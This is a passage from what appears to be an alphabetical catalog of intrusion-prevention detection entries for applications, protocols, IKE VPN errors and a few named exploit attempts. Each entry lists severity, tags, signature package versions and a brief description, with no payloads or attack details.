About this situation: Application Ideator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ideator is a company developing an online business incubation platform that helps users to build a team, and launch business.
Back to top

IDENT

About this situation: Identification Protocol (IDENT) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1212-5242
Description: Ident protocol helps in identifying the user of a particular TCP connection.
Back to top

Identacor

About this situation: Application Identacor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Identacor - Single Sign-On
Back to top

Identi.ca

About this situation: Identi.ca usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: Identi.ca is a social microblogging service similar to Twitter, built on open source tools and open standards.
Back to top

Identified Text File

About this situation: Identified text file detection
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Text
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-487-5211
Description:
Back to top

IdentiFlo

About this situation: Application IdentiFlo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The IdentiFlo Management Platform grants full control to the administrative control features to create internal users, monitor transactions of internal sales people, track client transactions they service, and drill down to the end-consumer transaction level.
Back to top

Idera

About this situation: Application Idera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Idera is the industry in application and server management software for physical and virtual server platforms, with award-winning solutions for server backup and SQL Server administration.
Back to top

Idictate

About this situation: Application Idictate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dictate any document using any phone
Back to top

Idisk-Backup

About this situation: IDisk Backup usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application provides scheduled backups of files, folders, applications, and system preferences.
Back to top

Idoxgroup

About this situation: Application Idoxgroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Idox Group
Back to top

Idrive

About this situation: iDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application provides scheduled backups of files, folders, applications, and system preferences. It is a cloud-based backup service and also supports Android devices.
Back to top

IEC-104

About this situation: IEC-104 traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-776-5211
Last changed: sgpkg-ips-776-5211
Description: The IEC-104 (IEC-60870-5-104) is a protocol standard which describes network access for IEC 60870-5-101 using standard transport profiles.
Back to top

IEnumConnectionPoints

About this situation: MSRPC protocol traffic to IEnumConnectionPoints Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IEnumConnectionPoints Interface. This Application requires engine version 5.7.4 or higher.
Back to top

IEnumGUID

About this situation: MSRPC protocol traffic to IEnumGUID Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IEnumGUID Interface. This Application requires engine version 5.7.4 or higher.
Back to top

IEnumString

About this situation: MSRPC protocol traffic to IEnumString Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IEnumString Interface. This Application requires engine version 5.7.4 or higher.
Back to top

IEnumUnknown

About this situation: MSRPC protocol traffic to IEnumUnknown Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IEnumUnknown Interface. This Application requires engine version 5.7.4 or higher.
Back to top

iExchangeWeb

About this situation: Application iExchangeWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iExchangeWeb is an data transformation and transport service in an computing environment that does not require software installation, configuration or management.
Back to top

iFAMS

About this situation: Application iFAMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iFAMS is the only comprehensive and easy-to-use facilities and asset management system that gives you complete control without any database or programming knowledge
Back to top

Ifdsgroup

About this situation: Application Ifdsgroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IFDS provider of investor record keeping and transfer agency solutions on a BPO
Back to top

Ifeelgoods

About this situation: Application Ifeelgoods detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ifeelgoods provides a platform that enables marketers to reward their audiences of solutions - commerce, CRM, social media, shopper marketing, loyalty.
Back to top

iFlix

About this situation: iFlix usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1661-5242
Last changed: sgpkg-ips-1663-5242
Description: iFlix is a video on-demand streaming service. This application situation is meant only for blocking the application.
Back to top

IFRS

About this situation: Application IFRS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IFRS is an organisation responsible for the governance and oversight of the International accounting standards board.
Back to top

Ifttt

About this situation: IFTTT usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to connect different web applications together through simple conditional statements known as Recipes. Source: Wikipedia
Back to top

Igate

About this situation: Application Igate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IGATE provides integrated technology and operations-based solutions. IGATE provides solutions to clients' business challenges by leveraging its technology and process capabilities, underwritten by an understanding of domain and industry imperatives.
Back to top

IglooSoftware

About this situation: Application IglooSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IglooSoftware is a web-based solution that enables to share files, give updates, find answers, exchange ideas and work better together with colleagues and customers.
Back to top

Ign

About this situation: IGN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser. This application covers web gaming applications including ign, gamespy, fileplanet, teamxbox, gamestats, direct2drive, whattheyplay, cheatscodesguides, and battlefieldheroes.
Back to top

Ignify

About this situation: Application Ignify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ignify is a provider of eCommerce, Microsoft Dynamics ERP, Microsoft Dynamics CRM, Microsoft Dynamics Point of Sale, and Order Entry solutions to the mid-market and enterprise business segments.
Back to top

Ignite-Realtime

About this situation: Application Ignite-Realtime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ignite Realtime is the community site for the users and developers of Jive Software's open source Real Time Communications projects.
Back to top

Igreonline

About this situation: igreonline usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A service that provides anonymizing/proxy services that could allow users to hide or tunnel their online activities; Igre Online
Back to top

IHeartRadio

About this situation: iHeartRadio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-637-5211
Description: iHearRadio is an internet radio platform.
Back to top

iHelpDesk

About this situation: Application iHelpDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iHelpDesk is a cloud-based help desk service that allows organizations to keep track of issues, reduce manual effort in resolving problems and improve service quality.
Back to top

iiPAY

About this situation: iiPAY usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Description: iiPAY is web-based time tracking service.
Back to top

Ikariam

About this situation: Ikariam usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

IKE-Authentication-Failed

About this situation: Authentication Failed
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Authentication failed.
Back to top

IKE-Bad-Proposal-Syntax

About this situation: Bad Proposal Syntax
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains incorrectly formatted proposal.
Back to top

IKE-Internal-Address-Failure

About this situation: Internal Address Failure
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Internal address failure.
Back to top

IKE-Invalid-Attributes

About this situation: Invalid Attributes
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains incorrectly formatted attributes.
Back to top

IKE-Invalid-Certificate

About this situation: Invalid Certificate
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid or incorrectly formatted certificate.
Back to top

IKE-Invalid-Certificate-Authority

About this situation: Invalid Certificate Authority
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid or incorrectly formatted certificate authority.
Back to top

IKE-Invalid-Certificate-Type

About this situation: Invalid Certificate Type
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains unsupported certificate type.
Back to top

IKE-Invalid-Cookie

About this situation: Invalid IKE Cookie
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid cookie.
Back to top

IKE-Invalid-DOI

About this situation: Invalid DOI
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid Domain Of Interpretation (DOI) .
Back to top

IKE-Invalid-Exchange-Type

About this situation: Invalid IKE Exchange Type
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid exchange type.
Back to top

IKE-Invalid-Flags

About this situation: Invalid IKE Flags
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid IKE flags.
Back to top

IKE-Invalid-ID-Information

About this situation: Invalid ID Information
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Identification determination failed.
Back to top

IKE-Invalid-Isakmp-Version

About this situation: IKE ISAKMP Version
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid ISAKMP version.
Back to top

IKE-Invalid-KE-Payload

About this situation: Invalid KE Payload
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Invalid Key Exchange payload.
Back to top

IKE-Invalid-Key-Information

About this situation: Invalid Key Information
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Key exchange determination failed.
Back to top

IKE-Invalid-Major-Version

About this situation: Invalid Major Version
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE major version mismatch.
Back to top

IKE-Invalid-Message-ID

About this situation: Invalid Message ID
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid Message ID.
Back to top

IKE-Invalid-Next-Payload

About this situation: Invalid Next IKE Payload
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid next IKE Payload.
Back to top

IKE-Invalid-Proposal

About this situation: Invalid Proposal
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid proposal.
Back to top

IKE-Invalid-Protocol-ID

About this situation: Invalid Protocol ID
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid Protocol ID.
Back to top

IKE-Invalid-Reserved-Field

About this situation: Invalid Reserved Field
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid RESERVED field.
Back to top

IKE-Invalid-Situation

About this situation: Invalid Situation
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid situation.
Back to top

IKE-Invalid-SPI

About this situation: Invalid SPI
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid SPI.
Back to top

IKE-Invalid-Syntax

About this situation: Invalid Syntax
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Invalid syntax.
Back to top

IKE-Invalid-Transform

About this situation: Invalid Transform ID
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid transform ID.
Back to top

IKE-No-Proposal-Chosen

About this situation: No Proposal Chosen
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: No proposal chosen.
Back to top

IKE-Rejected-Message

About this situation: Rejected IKE Message
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet was rejected because the packet was for an unknown IKE SA.
Back to top

IKE-Retry-Limit-Reached

About this situation: IKE Retry Limit Reached
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE message retry limit was reached.
Back to top

IKE-SA-Deleted

About this situation: IKE SA Deleted
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE SA was deleted.
Back to top

IKE-SA-Expired

About this situation: IKE SA Expired
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE SA expired.
Back to top

IKE-SA-Initiator-Done

About this situation: IKE SA Initiator Done
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE SA initiator negotiation was completed successfully.
Back to top

IKE-SA-Initiator-Failed

About this situation: IKE SA Initiator Failed
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE SA initiator negotiation failed.
Back to top

IKE-SA-Responder-Done

About this situation: IKE SA Responder Done
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE SA responder negotiation was completed successfully.
Back to top

IKE-SA-Responder-Failed

About this situation: IKE SA Responder Failed
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE SA responder negotiation failed.
Back to top

IKE-Starting-Initiator-Negotiation

About this situation: Starting IKE Initiator Negotiation
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Starting IKE SA initiator negotiation.
Back to top

IKE-Starting-Responder-Negotiation

About this situation: Starting IKE Responder Negotiation
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Starting IKE SA responder negotiation.
Back to top

IKE-Timeout

About this situation: IKE Timeout
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE negotiation timedout.
Back to top

IKE-Traffic-Selector-Unacceptable

About this situation: Traffic Selector Unacceptable
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Traffic selector unacceptable.
Back to top

IKE-Unequal-Payload-Length

About this situation: Unequal IKE Payload Lengths
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains invalid payload.
Back to top

IKE-Unsupported-Critical-Payload

About this situation: Unsupported Critical Payload
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IKE packet contains unsupported critical payload.
Back to top

Illegal or Questionable

About this situation: Sites that provide instruction in or promote nonviolent crime or unethical or dishonest behavior or the avoidance of prosecution.
Context: URL Application Context
Severity: 1
Tags: Illegal or Questionable, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide instruction in or promote nonviolent crime or unethical or dishonest behavior or the avoidance of prosecution.
Back to top

Illuminate-Student-Information

About this situation: Application Illuminate-Student-Information detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The lluminate provides a software and support solutions designed to match mantra one system, one login, one solution. Three products that provide a complete data, information, and assessment solution for all school districts.
Back to top

Ilohamail

About this situation: IlohaMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A light weight yet full featured multilingual webmail program that is easy to use and instal.
Back to top

ILoveIM

About this situation: ILoveIM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1641-5242
Description: ILoveIM is a web-based instant messenger service that allows users to connect to MSN, Google Talk, AIM, and Yahoo via a web browser.
Back to top

Ilta-Sanomat

About this situation: Ilta-Sanomat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-943-5242
Description: Ilta-Sanomat is a Finnish daily newspaper.
Back to top

Iltalehti

About this situation: Iltalehti usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: Iltalehti is a Finnish daily newspaper.
Back to top

IM+

About this situation: Application IM+ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IM
Back to top

IM-Creator

About this situation: Application IM-Creator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IM Creator is a cloud-based web development platform allowing individuals and businesses to create and maintain HTML5 websites, blogs and online stores without writing code.
Back to top

IM-TCP_Aim-SignOn-Reply

About this situation: AOL Instant messenger reply for sign-on attempt
Context: TCP Server Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, AOL Instant Messenger, Any Operating System not specific, Instant Messaging, TCP Server Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: AOL-Instant-Messenger-Usage
Description:
Back to top

IM-TCP_AOL-SignOn

About this situation: AOL Instant Messenger sign-on attempt
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, AOL Instant Messenger, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: AOL-Instant-Messenger-Usage
Description:
Back to top

IM-TCP_GAIM-ICQ-Protocol-Away-Message-BOF

About this situation: GAIM ICQ protocol away message buffer overflow attempt
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, GAIM, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-529-5211
Vulnerability: IM-GAIM-ICQ-Protocol-Away-Message-BOF
Description:
Back to top

IM-TCP_ICQ-Network-Login

About this situation: ICQ login attempt
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, ICQ, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-665-5211
Vulnerability: ICQ-Instant-Messenger-Network-Usage
Description:
Back to top

IM-TCP_IRC-Server-Detected

About this situation: IRC server detected
Context: TCP Server Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Instant Messaging, TCP Server Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-615-5211
Vulnerability: IRC-Network-Usage
Description:
Back to top

IM-TCP_IRC-Server-Login

About this situation: IRC server login attempt
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Generic IRC client, Any Operating System not specific, Generic IRC client not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1162-5242
Vulnerability: IRC-Network-Usage
Description:
Back to top

IM-TCP_MSN-Login

About this situation: MSN Messenger login attempt
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, MSN Messenger, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: MSN-Messenger-Usage
Description:
Back to top

IM-TCP_MSN-Login-Reply

About this situation: Reply for MSN Messenger login attempt
Context: TCP Server Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, MSN Messenger, Any Operating System not specific, Instant Messaging, TCP Server Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: MSN-Messenger-Usage
Description:
Back to top

IM-TCP_MSN-P2P-File-Transfer

About this situation: MSN Messenger file transfer
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, MSN Messenger, Any Operating System not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: MSN-Messenger-Usage
Description:
Back to top

IM-TCP_Pidgin-MSN-MSNP2P-Message-Integer-Overflow

About this situation: Attempt to exploit an integer overflow vulnerability in Pidgin instant messaging client detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Pidgin, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-171-2032
Vulnerability: Pidgin-MSN-MSNP2P-Message-Integer-Overflow
Description:
Back to top

IM-TCP_SKYPE-Login

About this situation: Skype login
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Skype, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-516-5211
Vulnerability: SKYPE-Network-Usage
Description:
Back to top

IM-TCP_SS-Cerulean-Studios-Trillian-Oscar-Image-Filename-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cerulean Studios' Trillian detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Trillian, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-451-4333
Vulnerability: Cerulean-Studios-Trillian-Oscar-Image-Filename-Stack-Buffer-Overflow
Description:
Back to top

IM-TCP_SS-Cerulean-Studios-Trillian-Oscar-Tag-Handling-Heap-Buffer-Overflow

About this situation: An attempt to exploit heap overflow vulnerability in Cerulean Studios' Trillian detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Trillian, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-451-4333
Vulnerability: Cerulean-Studios-Trillian-Oscar-Tag-Handling-Heap-Buffer-Overflow
Description:
Back to top

Image-Relay

About this situation: Application Image-Relay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Image Relay is a digital asset management (DAM) tool with your time in mind. Online solution for managing your business' digital assets and media.
Back to top

Imageloop.com

About this situation: Imageloop.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

ImageShack

About this situation: Application ImageShack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ImageShack is the hosting company for online media. It provides products and hosts of images and videos for users.
Back to top

ImageTrend

About this situation: Application ImageTrend detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ImageTrend is a software developing company focused on providing database-driven solutions. It is able to solve business issues, connecting businesses to partners, employees and customers.
Back to top

iMagicLab

About this situation: Application iMagicLab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iMagicLab provides automative CRM solution for car dealers.
Back to top

Imagineer

About this situation: Application Imagineer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Imagineer
Back to top

iManageProject

About this situation: Application iManageProject detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iManageProject - web based project management tool, helps you with project collaboration, time tracking, collaboration management, to-dos, milestones, send and receive messages and schedule tasks.
Back to top

IMAP

About this situation: Internet Message Access Protocol (IMAP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Mail, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1190-5242
Description: Internet Message Access Protocol (IMAP) usage.
Back to top

IMAPS

About this situation: Internet Message Access Protocol (IMAPS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Mail
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1122-5242
Description: Internet Message Access Protocol (IMAP) usage over TLS connection (IMAPS). This application can work only if TLS decryption is enabled.
Back to top

IMAP_Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption

